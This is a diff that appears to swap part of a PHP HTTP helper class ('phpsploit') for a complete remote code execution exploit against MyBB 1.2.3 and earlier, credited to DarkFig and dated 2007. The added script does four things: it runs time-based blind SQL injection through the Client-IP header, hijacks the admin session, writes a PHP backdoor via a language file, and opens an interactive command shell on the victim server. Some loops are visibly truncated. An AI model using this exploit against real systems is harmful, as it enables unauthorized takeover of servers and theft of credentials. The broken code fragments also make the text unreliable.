    -		if($this->method==="get") $this->packet = "GET ".$this->url." HTTP/1.1\r\n";
    -		elseif($this->method==="post" or $this->method==="formdata") $this->packet = "POST ".$this->url. " HTTP/1.1\r\n";
    -		else die("Error: Invalid method");
    -		
    -		if(!empty($this->proxyuser)) $this->packet .= "Proxy-Authorization: Basic ".base64_encode($this->proxyuser.":".$this->proxypass)."\r\n";
    -		$this->packet .= "Host: ".$this->host."\r\n";
    -		
    -		if(!empty($this->agent))  $this->packet .= "User-Agent: ".$this->agent."\r\n";
    -		if(!empty($this->header)) $this->packet .= $this->header."\r\n";
    -		if(!empty($this->cookie)) $this->packet .= "Cookie: ".$this->cookie."\r\n";
    -		
    -		$this->packet .= "Connection: Close\r\n";
    -		if($this->method==="post")
    -		{
    -			$this->packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
    -			$this->packet .= "Content-Length: ".strlen($this->data)."\r\n\r\n";
    -			$this->packet .= $this->data."\r\n";
    -		}
    -		elseif($this->method==="formdata")
    -		{
    -			$this->packet .= "Content-Type: multipart/form-data; boundary=---------------------------".$this->boundary."\r\n";
    -			$this->packet .= "Content-Length: ".strlen($this->data)."\r\n\r\n";
    -			$this->packet .= $this->data;
    -		}
    -		$this->packet .= "\r\n";
    -		$this->recv = '';
    -		
    -		fputs($socket,$this->packet);
    -		while(!feof($socket)) $this->recv .= fgets($socket);
    -		fclose($socket);
    -		
    -		if($this->cookiejar) $this->cookiejar($this->getheader($this->recv));
    -		if($this->allowredirection) return $this->allowredirection($this->recv);
    -		else return $this->recv;
    -	}
    -	
    -
    -	/**
    -	 * This function allows you to add several cookie in the
    -	 * request. Several methods are supported:
    -	 * 
    -	 * $this->addcookie("name","value");
    -	 * or
    -	 * $this->addcookie("name=newvalue");
    -	 * or
    -	 * $this->addcookie("othername=overvalue; xx=zz; y=u");
    -	 * 
    -	 * @param string $cookiename
    -	 * @param string $cookievalue
    -	 * 
    -	 */
    -	public function addcookie($cookn,$cookv='')
    -	{
    -		// $this->addcookie("name","value"); work avec replace
    -		if(!empty($cookv))
    -		{
    -			if($cookv === "deleted") $cookv=''; // cookiejar(1) && Set-Cookie: name=delete
    -			if(!empty($this->cookie))
    -			{
    -			    if(preg_match("/$cookn=/",$this->cookie))
    -			    {
    -			    	$this->cookie = preg_replace("/$cookn=(\S*);/","$cookn=$cookv;",$this->cookie);
    -			    }
    -			    else
    -			    {
    -			    	$this->cookie .= " ".$cookn."=".$cookv.";"; // " ".
    -			    }
    -			}
    -			else
    -			{
    -				$this->cookie = $cookn."=".$cookv.";";
    -			}
    -		}
    -		// $this->addcookie("name=value; othername=othervalue");
    -		else
    -		{
    -	    	 if(!empty($this->cookie))
    -	    	 {
    -	    	 	$cookn = preg_replace("/(.*);$/","$1",$cookn);
    -	    	 	$cookarr = explode(";",str_replace(" ", "",$cookn));
    -	    	 	for($i=0;$iaddcookie($cookn,$cookv);
    -	    	 	}
    -	    	 }
    -			 else
    -			 {
    -			 	$cookn = ((substr($cookn,(strlen($cookn)-1),1))===";") ? $cookn : $cookn.";";
    -			 	$this->cookie = $cookn;			
    -			 }
    -		}
    -	}
    -	
    -	
    -	/**
    -	 * This function allows you to add several headers in the
    -	 * request. Several methods are supported:
    -	 *
    -	 * $this->addheader("headername","headervalue");
    -	 * or
    -	 * $this->addheader("headername: headervalue");
    -	 *
    -	 * @param string $headername
    -	 * @param string $headervalue
    -	 */
    -	public function addheader($headern,$headervalue='')
    -	{
    -		// $this->addheader("name","value");
    -		if(!empty($headervalue))
    -		{
    -			if(!empty($this->header))
    -			{
    -				if(preg_match("/$headern:/",$this->header))
    -				{
    -					$this->header = preg_replace("/$headern: (\S*)/","$headern: $headervalue",$this->header);
    -				}
    -				else
    -				{
    -					$this->header .= "\r\n".$headern.": ".$headervalue;
    -				}
    -			}
    -			else
    -			{
    -				$this->header=$headern.": ".$headervalue;
    -			}
    -		}
    -		// $this->addheader("name: value");
    -		else 
    -		{
    -			if(!empty($this->header))
    -			{
    -				$headarr = explode(": ",$headern);
    -				$headern = $headarr[0];
    -				$headerv = $headarr[1];
    -				$this->addheader($headern,$headerv);
    -			}
    -			else
    -			{
    -				$this->header=$headern;
    -			}
    -		}
    -	}
    -	
    -
    -	/**
    -	 * This function allows you to use an http proxy server.
    -	 * Several methods are supported:
    -	 * 
    -	 * $this->proxy("proxyip","8118");
    -	 * or
    -	 * $this->proxy("proxyip:8118")
    -	 *
    -	 * @param string $proxyhost
    -	 * @param integer $proxyport
    -	 */
    -	public function proxy($proxy,$proxyp='')
    -	{
    -		// $this->proxy("localhost:8118");
    -		if(empty($proxyp))
    -		{
    -			preg_match("/^(\S*):(\d+)$/",$proxy,$proxarr);
    -			$proxh = $proxarr[1];
    -			$proxp = $proxarr[2];
    -			$this->proxyhost=$proxh;
    -			$this->proxyport=$proxp;
    -		}
    -		// $this->proxy("localhost",8118);
    -		else 
    -		{
    -			$this->proxyhost=$proxy;
    -			$this->proxyport=intval($proxyp);
    -		}
    -		if($this->proxyport > 65535) die("Error: Invalid port number");
    -	}
    -	
    -
    -	/**
    -	 * This function allows you to use an http proxy server
    -	 * which requires a basic authentification. Several
    -	 * methods are supported:
    -	 * 
    -	 * $this->proxyauth("darkfig","dapasswd");
    -	 * or
    -	 * $this->proxyauth("darkfig:dapasswd");
    -	 *
    -	 * @param string $proxyuser
    -	 * @param string $proxypass
    -	 */
    -	public function proxyauth($proxyauth,$proxypasse='')
    -	{
    -		// $this->proxyauth("darkfig:password");
    -		if(empty($proxypasse))
    -		{
    -			preg_match("/^(.*):(.*)$/",$proxyauth,$proxautharr);
    -			$proxu = $proxautharr[1];
    -			$proxp = $proxautharr[2];
    -			$this->proxyuser=$proxu;
    -			$this->proxypass=$proxp;
    -		}
    -		// $this->proxyauth("darkfig","password");
    -		else
    -		{
    -			$this->proxyuser=$proxyauth;
    -			$this->proxypass=$proxypasse;
    -		}
    -	}
    -
    -	
    -	/**
    -	 * This function allows you to set the "User-Agent" header.
    -	 * Several methods are possible to do that:
    -	 * 
    -	 * $this->agent("Mozilla Firefox");
    -	 * or
    -	 * $this->addheader("User-Agent: Mozilla Firefox");
    -	 * or
    -	 * $this->addheader("User-Agent","Mozilla Firefox");
    -	 * 
    -	 * @param string $useragent
    -	 */
    -	public function agent($useragent)
    -	{
    -		$this->agent=$useragent;
    -	}
    -
    -	
    -	/**
    -	 * This function returns the header which will be
    -	 * in the next request.
    -	 * 
    -	 * $this->showheader();
    -	 *
    -	 * @return $header
    -	 */
    -	public function showheader()
    -	{
    -		return $this->header;
    -	}
    -
    -	
    -	/**
    -	 * This function returns the cookie which will be
    -	 * in the next request.
    -	 * 
    -	 * $this->showcookie();
    -	 *
    -	 * @return $storedcookies
    -	 */
    -	public function showcookie()
    -	{
    -		return $this->cookie;
    -	}
    -
    -	
    -	/**
    -	 * This function returns the last formed
    -	 * http request (the http packet).
    -	 * 
    -	 * $this->showlastrequest();
    -	 * 
    -	 * @return $last_http_request
    -	 */
    -	public function showlastrequest()
    -	{
    -		return $this->packet;
    -	}
    -	
    -	
    -	/**
    -	 * This function sends the formed http packet with the
    -	 * GET method. You can precise the port of the host.
    -	 * 
    -	 * $this->get("http://localhost");
    -	 * $this->get("http://localhost:888/xd/tst.php");
    -	 * 
    -	 * @param string $urlwithpath
    -	 * @return $server_response
    -	 */
    -	public function get($url)
    -	{
    -		$this->target($url);
    -		$this->method="get";
    -		return $this->sock();
    -	}
    -
    -	
    -	/**
    -	 * This function sends the formed http packet with the
    -	 * POST method. You can precise the port of the host.
    -	 * 
    -	 * $this->post("http://localhost/index.php","admin=1&user=dark");
    -	 *
    -	 * @param string $urlwithpath
    -	 * @param string $postdata
    -	 * @return $server_response
    -	 */	
    -	public function post($url,$data)
    -	{
    -		$this->target($url);
    -		$this->method="post";
    -		$this->data=$data;
    -		return $this->sock();
    -	}
    -	
    -
    -	/**
    -	 * This function sends the formed http packet with the
    -	 * POST method using the multipart/form-data enctype. 
    -	 * 
    -	 * $array = array(
    -	 *          frmdt_url      => "http://localhost/upload.php",
    -	 *          frmdt_boundary => "123456",                    # Optional
    -	 *                 "email" => "me@u.com",
    -	 *               "varname" => array(
    -	 *                            frmdt_type => "image/gif",   # Optional
    -	 *                       frmdt_transfert => "binary",      # Optional
    -	 *                        frmdt_filename => "hello.php",
    -	 *                         frmdt_content => ""));
    -	 * $this->formdata($array);
    -	 *
    -	 * @param array $array
    -	 * @return $server_response
    -	 */
    -	public function formdata($array)
    -	{
    -		$this->target($array[frmdt_url]);
    -		$this->method="formdata";
    -		$this->data='';
    -		if(!isset($array[frmdt_boundary])) $this->boundary="phpsploit";
    -		else $this->boundary=$array[frmdt_boundary];
    -		foreach($array as $key => $value)
    -		{
    -			if(!preg_match("#^frmdt_(boundary|url)#",$key))
    -			{
    -				$this->data .= "-----------------------------".$this->boundary."\r\n";
    -				$this->data .= "Content-Disposition: form-data; name=\"".$key."\";";
    -				if(!is_array($value))
    -				{
    -					$this->data .= "\r\n\r\n".$value."\r\n";
    -				}
    -				else
    -				{
    -					$this->data .= " filename=\"".$array[$key][frmdt_filename]."\";\r\n";
    -					if(isset($array[$key][frmdt_type])) $this->data .= "Content-Type: ".$array[$key][frmdt_type]."\r\n";
    -					if(isset($array[$key][frmdt_transfert])) $this->data .= "Content-Transfer-Encoding: ".$array[$key][frmdt_transfert]."\r\n";
    -					$this->data .= "\r\n".$array[$key][frmdt_content]."\r\n";
    -				}
    -			}
    -		}
    -		$this->data .= "-----------------------------".$this->boundary."--\r\n";
    -		return $this->sock();
    -	}
    -
    -	
    -	/**
    -	 * This function returns the content of the server response
    -	 * without the headers.
    -	 * 
    -	 * $this->getcontent($this->get("http://localhost/"));
    -	 * or
    -	 * $this->getcontent();
    -	 *
    -	 * @param string $server_response
    -	 * @return $onlythecontent
    -	 */
    -	public function getcontent($code='')
    -	{
    -		if(empty($code)) $code = $this->recv;
    -		$content = explode("\n",$code);
    -		$onlycode = '';
    -		for($i=1;$igetheader($this->post("http://localhost/x.php","x=1&z=2"));
    -	 * or
    -	 * $this->getheader();
    -	 *
    -	 * @param string $server_response
    -	 * @return $onlytheheaders
    -	 */
    -	public function getheader($code='')
    -	{
    -		if(empty($code)) $code = $this->recv;
    -		$header = explode("\n",$code);
    -		$onlyheader = $header[0]."\n";
    -		for($i=1;$iaddcookie($cookn,$cookv);
    -		}
    -    }
    -
    -	
    -	/**
    -	 * This function is called by the get()/post() functions.
    -	 * You don't have to call it.
    -	 *
    -	 * @param string $urltarg
    -	 */
    -	private function target($urltarg)
    -	{
    -		if(!preg_match("/^http:\/\/(.*)\//",$urltarg)) $urltarg .= "/";
    -		$this->url=$urltarg;
    -		
    -		$array = explode("/",str_replace("http://","",preg_replace("/:(\d+)/","",$urltarg)));
    -		$this->host=$array[0];
    -
    -		preg_match("/:(\d+)\//",$urltarg,$matches);
    -		$this->port=empty($matches[1]) ? 80 : $matches[1];
    -		
    -		$temp = str_replace("http://","",preg_replace("/:(\d+)/","",$urltarg));
    -		preg_match("/\/(.*)\//",$temp,$matches);
    -		$this->path=str_replace("//","/","/".$matches[1]."/");
    -	
    -		if($this->port > 65535) die("Error: Invalid port number");
    -	}
    -	
    -	
    -	/**
    -	 * If you call this function, the script will
    -	 * extract all "Set-Cookie" headers values
    -	 * and it will automatically add them into the "Cookie" header
    -	 * for all next requests.
    -	 *
    -	 * $this->cookiejar(1); // enabled
    -	 * $this->cookiejar(0); // disabled
    -	 * 
    -	 */
    -	public function cookiejar($code)
    -	{
    -		if($code===0) $this->cookiejar='';
    -		if($code===1) $this->cookiejar=1;
    -		else
    -		{
    -			$this->getcookie($code);
    -		}
    -	}
    -
    -
    -	/**
    -	 * If you call this function, the script will
    -	 * follow all redirections sent by the server.
    -	 * 
    -	 * $this->allowredirection(1); // enabled
    -	 * $this->allowredirection(0); // disabled
    -	 * 
    -	 * @return $this->get($locationresponse)
    -	 */
    -	public function allowredirection($code)
    -	{
    -		if($code===0) $this->allowredirection='';
    -		if($code===1) $this->allowredirection=1;
    -		else
    -		{
    -			if(preg_match("/(location|content-location|uri): (.*)/i",$code,$codearr))
    -			{
    -				$location = str_replace(chr(13),'',$codearr[2]);
    -				if(!eregi("://",$location))
    -				{
    -					return $this->get("http://".$this->host.$this->path.$location);
    -				}
    -				else
    -				{
    -					return $this->get($location);
    -				}
    -			}
    -			else
    -			{
    -				return $code;
    -			}
    -		}
    -	}
    -	
    -	
    -	/**
    -	 * This function allows you to reset some parameters:
    -	 * 
    -	 * $this->reset(header); // headers cleaned
    -	 * $this->reset(cookie); // cookies cleaned
    -	 * $this->reset();       // clean all parameters
    -	 *
    -	 * @param string $func
    -	 */
    -	public function reset($func='')
    -	{
    -		switch($func)
    -		{
    -			case "header":
    -			$this->header='';
    -			break;
    -			
    -			case "cookie":
    -			$this->cookie='';
    -			break;
    -			
    -			default:
    -		        $this->cookiejar='';
    -		        $this->header='';
    -		        $this->cookie='';
    -		        $this->allowredirection=''; 
    -		        $this->agent='';
    -		        break;
    -		}
    -	}
    -}
    -?>
    -
    -# milw0rm.com [2007-04-03]
    +#!/usr/bin/php
    +escape_string.
    +# They don't corrected the function (this is a choice ... the bad) and they forgot to correct 1 (only) SQL request.
    +# They must correct the problem at the source =)
    +#
    +if($argc < 3)
    +{
    +print("
    +---  MyBulletinBoard (MyBB) <= 1.2.3 Remote Code Execution Exploit  ---
    +-----------------------------------------------------------------------
    +PHP conditions: none
    +       Credits: DarkFig 
    +           URL: http://www.acid-root.new.fr/
    +-----------------------------------------------------------------------
    +  Usage: $argv[0] -url http://victim.com/ [Options]
    + Params: -url       For example http://victim.com/myBB/
    +Options: -debug     Debug mod activated (debug_mybb.html)
    +         -truetime  Server response time which returns true
    +         -benchmark You can change the value used in benchmark()
    +         -proxy     If you wanna use a proxy  
    +         -proxyauth Basic authentification 
    +   Note: If you have some problems use -debug, -benchmark, -truetime
    +-----------------------------------------------------------------------
    +");exit(1);
    +}
    +
    +$url       = getparam('url',1);
    +$debug     = (getparam('debug')!='')     ? 1 : 0;
    +$benchmark = (getparam('benchmark')!='') ? getparam('benchmark') : '1000000';
    +$proxy     = getparam($proxy);
    +$proxyauth = getparam($proxyauth);
    +
    +$backdoor  = 'uploads/avatars/backdoor.php'; # inc/cache/backdoor.php
    +$filetoed  = 'index.lang.php';
    +
    +$xpl = new phpsploit();
    +$xpl->agent('Firefox');
    +if($proxy) $xpl->proxy($proxy);
    +if($proxyauth) $xpl->proxyauth($proxyauth);
    +if($debug) debug(1);
    +
    +# There is two solutions to be logged in as administrator.
    +#
    +# SOLUTION NUMBER 1
    +# mysql> select * from mybb_users\G
    +# *************************** 1. row ***************************
    +#              uid: 1
    +#         username: root
    +#         password: 39ac8681f5cf4fcd9c9c09719a618bd3
    +#             salt: BFeJBOCF
    +#         loginkey: VYLJia9InmLgM1PT6v2whyMbaoSuprngLnkW55j3zlywItyZBA...
    +#
    +# $xpl->post($url.'admin/index.php','username=root&password=toor&do=login&goto=');
    +# print $xpl->getcontent(); // ...Welcome to the MyBB Administration Control Panel...
    +# 
    +# SOLUTION NUMBER 2
    +# mysql> select * from mybb_adminsessions\G
    +# *************************** 1. row ***************************
    +#        sid: 81e267263b9254f3aaf670383bfbfec9
    +#        uid: 1
    +#   loginkey: VYLJia9InmLgM1PT6v2whyMbaoSuprngLnkW55j3zlywItyZBA
    +#         ip: 127.0.0.1
    +#   dateline: 1175443967
    +# lastactive: 1175444369
    +#
    +# $xpl->addheader('Client-IP','127.0.0.1');
    +# $xpl->get($url.'admin/index.php?adminsid=81e267263b9254f3aaf670383bfbfec9');
    +# print $xpl->getcontent(); // ...Welcome to the MyBB Administration Control Panel...
    +#
    +# I decided to use the solution number 2.
    +# We can also add an administrator (easily) ... but it's not interesting.
    +#
    +print "\nAdmin IP : "; $ip  = sql_inject('ip');
    +print "\nAdmin sid: "; $sid = sql_inject('sid');
    +print "\nTrying to be logged in as administrator";
    +
    +$xpl->addheader('Client-IP',$ip);
    +$xpl->get($url."admin/languages.php?adminsid=$sid");
    +
    +# Trying to find the language
    +if(preg_match('#getcontent(),$langmatches)) $lang=$langmatches[1];
    +else $lang='english';
    +print "\nLanguage: $lang";
    +
    +# Language configuration
    +$xpl->get($url."admin/languages.php?adminsid=$sid&action=edit&lang=$lang&editwith=0&file=$filetoed");
    +preg_match_all('#name="(.*)">(.*)</textarea>#',$xpl->getcontent(),$name_value);
    +
    +# We can't use:
    +# - 
    +# - ' OR "
    +#
    +$PHPCODE = '${${error_reporting(0)}}'
    +          .'${${$handle=fopen('.chrit('./'.$backdoor).','.chrit('w').')}}'
    +          .'${${fwrite($handle,'.chrit('').')}}'
    +          .'${${fclose($handle)}}';
    +$name_value[2][0] .= $PHPCODE;
    +
    +$postdata=array(frmdt_url => $url.'admin/languages.php',
    +               "adminsid" => $sid, "action" => "do_edit",
    +               "lang" => $lang, "editwith" => 0,
    +               "inadmin"=> 0, "file"=> $filetoed,
    +               "Update Language Variables"=>"  Update Language Variables");
    +
    +for($i=0;$ishowlastrequest();
    +$xpl->formdata($postdata);
    +
    +# Trying to execute the php code
    +$xpl->get($url.'index.php');
    +
    +# If not the default language
    +$xpl->get($url.'inc/languages/'.$lang.'/'.$filetoed);
    +print "\nThe php file should be created\n\$shell> ";
    +
    +# Hello master
    +while(!preg_match("#^(quit|exit)$#",($cmd = trim(fgets(STDIN)))))
    +{
    +    # ');include('../../inc/config.php');print $config['password'];//
    +    $xpl->addheader('Shell',"system('$cmd');");
    +    $xpl->get($url.$backdoor);
    +    print $xpl->getcontent()."\n\$shell> ";
    +}
    +
    +function sql_inject($field)
    +{
    +	global $xpl,$url,$prefix,$debug,$result,$bef,$aft,$truetime,$benchmark,$a,$b,$sub,$f; #,$fakeip
    +	$sub=0;$string='';
    +	
    +	if($field=='ip') {$a='44';$b='57';} # . 0-9
    +	else {$a='46';$b='70';}             # 0-9 A-Z
    +	
    +	while(TRUE)
    +	{
    +		$sub++;
    +		for($i=$a;$i<=$b;$i++)
    +		{
    +			# Random ip
    +			$fakeip = rand(128,254).'.'
    +			         .rand(128,254).'.'
    +			         .rand(128,254).'.'
    +			         .rand(128,254);
    +
    +			# Calculation of the server response time which returns TRUE
    +			if($i==$a) $f='TST';
    +			
    +			# End of the string ?
    +			elseif($i==($a+1)) $f='NULL';
    +			
    +			# Test the char
    +			else $f=$i;
    +			
    +			# Table prefix
    +			if($sub==1 AND $i==$a)
    +			{
    +				$xpl->addheader('Client-IP',$fakeip."'");
    +				$xpl->get($url.'index.php');
    +
    +				if(preg_match("#DELETE FROM (\S*)sessions#i",$xpl->getcontent(),$match)) $prefix=$match[1];
    +				else $prefix='mybb_';
    +			}
    +
    +			# +-class_session.php (#2)
    +			# |
    +			# 475.	function create_session($uid=0)
    +			# 476.	{
    +			# 477.		global $db;
    +			# 478.		$speciallocs = $this->get_special_locations();
    +			# 479.
    +			# 480.		// If there is a proper uid, delete by uid.
    +			# 481.		if($uid > 0)
    +			# 482.		{
    +			# 483.			$db->delete_query(TABLE_PREFIX."sessions", "uid=".$uid);
    +			# 484.			$onlinedata['uid'] = $uid;
    +			# 485.		}
    +			# 486.		// Else delete by ip.
    +			# 487.		else
    +			# 488.		{   // $this->ipaddress = get_ip();
    +			# 489.			$db->delete_query(TABLE_PREFIX."sessions", "ip='".$this->ipaddress."'");
    +			# 490.			$onlinedata['uid'] = 0;
    +			# 491.		}
    +			#
    +			$sql  = $fakeip."' OR ip=(SELECT IF(SUBSTR(";
    +			$sql .= ($f=='TST') ? "(SELECT 1)" : "(SELECT $field FROM ${prefix}adminsessions ORDER BY lastactive DESC LIMIT 1)";
    +			$sql .= ($f=='TST') ? ",1" : ",$sub";
    +			$sql .= ($f=='TST') ? ",1)=CHAR(49)" : ",1)=CHAR($f)";
    +			$sql .= ",BENCHMARK($benchmark,CHAR(66)),1)) #";
    +
    +
    +			# +-functions.php (#1)
    +			# |
    +			# 1836. function get_ip()
    +			# 1837. {
    +			# 1838.	if(isset($_SERVER['HTTP_X_FORWARDED_FOR']))
    +			# 1839.	{
    +			# 1840.		if(preg_match_all("#[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}#s", $_SERVER['HTTP_X_FORWARDED_FOR'], $addresses))
    +			# 1841.		{
    +			# 1842.			foreach($addresses[0] as $key => $val)
    +			# 1843.			{
    +			# 1844.				if(!preg_match("#^(10|172\.16|192\.168)\.#", $val))
    +			# 1845.				{
    +			# 1846.					$ip = $val;
    +			# 1847.					break;
    +			# 1848.				}
    +			# 1849.			}
    +			# 1850.		}
    +			# 1851.	}
    +			# 1852.	if(!isset($ip))
    +			# 1853.	{
    +			# 1854.		if(isset($_SERVER['HTTP_CLIENT_IP']))
    +			# 1855.		{
    +			# 1856.			$ip = $_SERVER['HTTP_CLIENT_IP'];
    +			# 1857.		}
    +			# 1858.		else
    +			# 1859.		{
    +			# 1860.			$ip = $_SERVER['REMOTE_ADDR'];
    +			# 1861.		}
    +			# 1862.	}
    +			# 1863.	return $ip;
    +			# 1864. }
    +			#
    +			$bef = time();
    +			$xpl->reset('header');
    +			$xpl->addheader('Client-IP',$sql);
    +			$xpl->get($url.'index.php');
    +			$aft = time();
    +			
    +			if($f=='TST') $truetime=$aft-$bef;
    +			if(getparam('truetime')!='') $truetime=getparam('truetime');
    +			
    +			# Server response time >= Server response time which returns TRUE ?
    +			$restime = $aft-$bef;
    +			if($restime >= $truetime AND $f != 'TST') $result='TRUE';
    +			else $result='FALSE';
    +
    +			# Debug mode activated
    +			if($debug) debug('',$field);
    +			
    +			# The tested char returns TRUE
    +			if($result=='TRUE')
    +			{
    +				if($f!='NULL')
    +				{
    +					# Continue
    +					print strtolower(chr($f));
    +					$string .= chr($f);
    +					break;
    +				}
    +				else
    +				{
    +					# End of the string
    +					$xpl->reset('header');
    +					return $string;
    +				}
    +			}
    +			
    +			# Retry if no char found
    +			if($f==$b) $sub--;
    +		}
    +	}
    +}
    +
    +function debug($init='',$dafield='')
    +{
    +	global $result,$bef,$aft,$truetime,$benchmark,$a,$b,$sub,$f; #,$fakeip
    +	if($init)
    +	{
    +		$handle = fopen("debug_mybb.html","w+");
    +		$data = "

    MyBulletinBoard (MyBB) <= 1.2.3 Code Execution Exploit

    +
    REQUEST TIMERESPONSE TIMETRUETIMEBENCHMARKRESULTIPFIELDCHARSETSUBSTR()ORD()CHAR() ".htmlentities($bef)."  ".htmlentities($aft)."  ".htmlentities($truetime)."  ".htmlentities($benchmark)."  ".htmlentities($result)."  ".htmlentities($fakeip)."  ".htmlentities($dafield)."  ".htmlentities("$a-$b")."  ".htmlentities($sub)."  ".htmlentities($f)."  ".htmlentities(chr($f))." 
+
+
+
+
+ ";
+ #
+ $data .= "
+
+
+
+ ";
+ fwrite($handle,$data);
+ fclose($handle);
+ }
+ else
+ {
+ $handle = fopen("debug_mybb.html","a");
+ $data = "
+
+
+
+
+ ";
+ #
+ $data .= "
+
+
+
+ ";
+ fwrite($handle,$data);
+ fclose($handle);
+ }
+}
+
+function chrit($string)
+{
+ $char = '';
+ for($i=0;$i $key)
+ {
+ if($key == '-'.$param) {
+ if(!empty($argv[$value+1])) return $argv[$value+1];
+ else return 1;
+ }
+ }
+ if($opt) exit("\n-$param parameter required");
+ else return;
+}
+
+/*
+ *
+ * Copyright (C) darkfig
+ *
+ * This program is free software; you can redistribute it and/or
+ * modify it under the terms of the GNU General Public License
+ * as published by the Free Software Foundation; either version 2
+ * of the License, or (at your option) any later version.
+ *
+ * This program is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ * GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with this program; if not, write to the Free Software
+ * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
+ *
+ * TITLE: PhpSploit Class
+ * REQUIREMENTS: PHP 5 (remove "private", "public" if you have PHP 4)
+ * VERSION: 1.2
+ * LICENSE: GNU General Public License
+ * ORIGINAL URL: http://www.acid-root.new.fr/tools/03061230.txt
+ * FILENAME: phpsploitclass.php
+ *
+ * CONTACT: gmdarkfig@gmail.com (french / english)
+ * GREETZ: Sparah, Ddx39
+ *
+ * DESCRIPTION:
+ * The phpsploit is a class implementing a web user agent.
+ * You can add cookies, headers, use a proxy server with (or without)
+ * basic authentification. It supports the GET and the POST method. 
It can
+ * also be used like a browser with the cookiejar() function (which allow
+ * a server to add several cookies for the next requests) and the
+ * allowredirection() function (which allow the script to follow all
+ * redirections sent by the server). It can return the content (or the
+ * headers) of the request. Others useful functions can be used for debugging.
+ * A manual is actually in development but to know how to use it, you can
+ * read the comments.
+ *
+ * CHANGELOG:
+ * [2007-01-24] (1.2)
+ * * Bug #2 fixed: Problem concerning the getcookie() function ((|;))
+ * * New: multipart/form-data enctype is now supported
+ *
+ * [2006-12-31] (1.1)
+ * * Bug #1 fixed: Problem concerning the allowredirection() function (chr(13) bug)
+ * * New: You can now call the getheader() / getcontent() function without parameters
+ *
+ * [2006-12-30] (1.0)
+ * * First version
+ *
+ */
+
+class phpsploit {
+
+ /**
+ * This function is called by the get()/post() functions.
+ * You don't have to call it, this is the main function.
+ *
+ * @return $server_response
+ */
+ private function sock()
+ {
+ if(!empty($this->proxyhost) && !empty($this->proxyport)) $socket = fsockopen($this->proxyhost,$this->proxyport);
+ else $socket = fsockopen($this->host,$this->port);
+
+ if(!$socket) die("Error: The host doesn't exist");
+
+ if($this->method==="get") $this->packet = "GET ".$this->url." HTTP/1.1\r\n";
+ elseif($this->method==="post" or $this->method==="formdata") $this->packet = "POST ".$this->url. 
" HTTP/1.1\r\n";
+ else die("Error: Invalid method");
+
+ if(!empty($this->proxyuser)) $this->packet .= "Proxy-Authorization: Basic ".base64_encode($this->proxyuser.":".$this->proxypass)."\r\n";
+ $this->packet .= "Host: ".$this->host."\r\n";
+
+ if(!empty($this->agent)) $this->packet .= "User-Agent: ".$this->agent."\r\n";
+ if(!empty($this->header)) $this->packet .= $this->header."\r\n";
+ if(!empty($this->cookie)) $this->packet .= "Cookie: ".$this->cookie."\r\n";
+
+ $this->packet .= "Connection: Close\r\n";
+ if($this->method==="post")
+ {
+ $this->packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
+ $this->packet .= "Content-Length: ".strlen($this->data)."\r\n\r\n";
+ $this->packet .= $this->data."\r\n";
+ }
+ elseif($this->method==="formdata")
+ {
+ $this->packet .= "Content-Type: multipart/form-data; boundary=---------------------------".$this->boundary."\r\n";
+ $this->packet .= "Content-Length: ".strlen($this->data)."\r\n\r\n";
+ $this->packet .= $this->data;
+ }
+ $this->packet .= "\r\n";
+ $this->recv = '';
+
+ fputs($socket,$this->packet);
+ while(!feof($socket)) $this->recv .= fgets($socket);
+ fclose($socket);
+
+ if($this->cookiejar) $this->cookiejar($this->getheader($this->recv));
+ if($this->allowredirection) return $this->allowredirection($this->recv);
+ else return $this->recv;
+ }
+
+
+ /**
+ * This function allows you to add several cookie in the
+ * request. 
Several methods are supported: + * + * $this->addcookie("name","value"); + * or + * $this->addcookie("name=newvalue"); + * or + * $this->addcookie("othername=overvalue; xx=zz; y=u"); + * + * @param string $cookiename + * @param string $cookievalue + * + */ + public function addcookie($cookn,$cookv='') + { + // $this->addcookie("name","value"); work avec replace + if(!empty($cookv)) + { + if($cookv === "deleted") $cookv=''; // cookiejar(1) && Set-Cookie: name=delete + if(!empty($this->cookie)) + { + if(preg_match("/$cookn=/",$this->cookie)) + { + $this->cookie = preg_replace("/$cookn=(\S*);/","$cookn=$cookv;",$this->cookie); + } + else + { + $this->cookie .= " ".$cookn."=".$cookv.";"; // " ". + } + } + else + { + $this->cookie = $cookn."=".$cookv.";"; + } + } + // $this->addcookie("name=value; othername=othervalue"); + else + { + if(!empty($this->cookie)) + { + $cookn = preg_replace("/(.*);$/","$1",$cookn); + $cookarr = explode(";",str_replace(" ", "",$cookn)); + for($i=0;$iaddcookie($cookn,$cookv); + } + } + else + { + $cookn = ((substr($cookn,(strlen($cookn)-1),1))===";") ? $cookn : $cookn.";"; + $this->cookie = $cookn; + } + } + } + + + /** + * This function allows you to add several headers in the + * request. 
Several methods are supported: + * + * $this->addheader("headername","headervalue"); + * or + * $this->addheader("headername: headervalue"); + * + * @param string $headername + * @param string $headervalue + */ + public function addheader($headern,$headervalue='') + { + // $this->addheader("name","value"); + if(!empty($headervalue)) + { + if(!empty($this->header)) + { + if(preg_match("/$headern:/",$this->header)) + { + $this->header = preg_replace("/$headern: (\S*)/","$headern: $headervalue",$this->header); + } + else + { + $this->header .= "\r\n".$headern.": ".$headervalue; + } + } + else + { + $this->header=$headern.": ".$headervalue; + } + } + // $this->addheader("name: value"); + else + { + if(!empty($this->header)) + { + $headarr = explode(": ",$headern); + $headern = $headarr[0]; + $headerv = $headarr[1]; + $this->addheader($headern,$headerv); + } + else + { + $this->header=$headern; + } + } + } + + + /** + * This function allows you to use an http proxy server. + * Several methods are supported: + * + * $this->proxy("proxyip","8118"); + * or + * $this->proxy("proxyip:8118") + * + * @param string $proxyhost + * @param integer $proxyport + */ + public function proxy($proxy,$proxyp='') + { + // $this->proxy("localhost:8118"); + if(empty($proxyp)) + { + preg_match("/^(\S*):(\d+)$/",$proxy,$proxarr); + $proxh = $proxarr[1]; + $proxp = $proxarr[2]; + $this->proxyhost=$proxh; + $this->proxyport=$proxp; + } + // $this->proxy("localhost",8118); + else + { + $this->proxyhost=$proxy; + $this->proxyport=intval($proxyp); + } + if($this->proxyport > 65535) die("Error: Invalid port number"); + } + + + /** + * This function allows you to use an http proxy server + * which requires a basic authentification. 
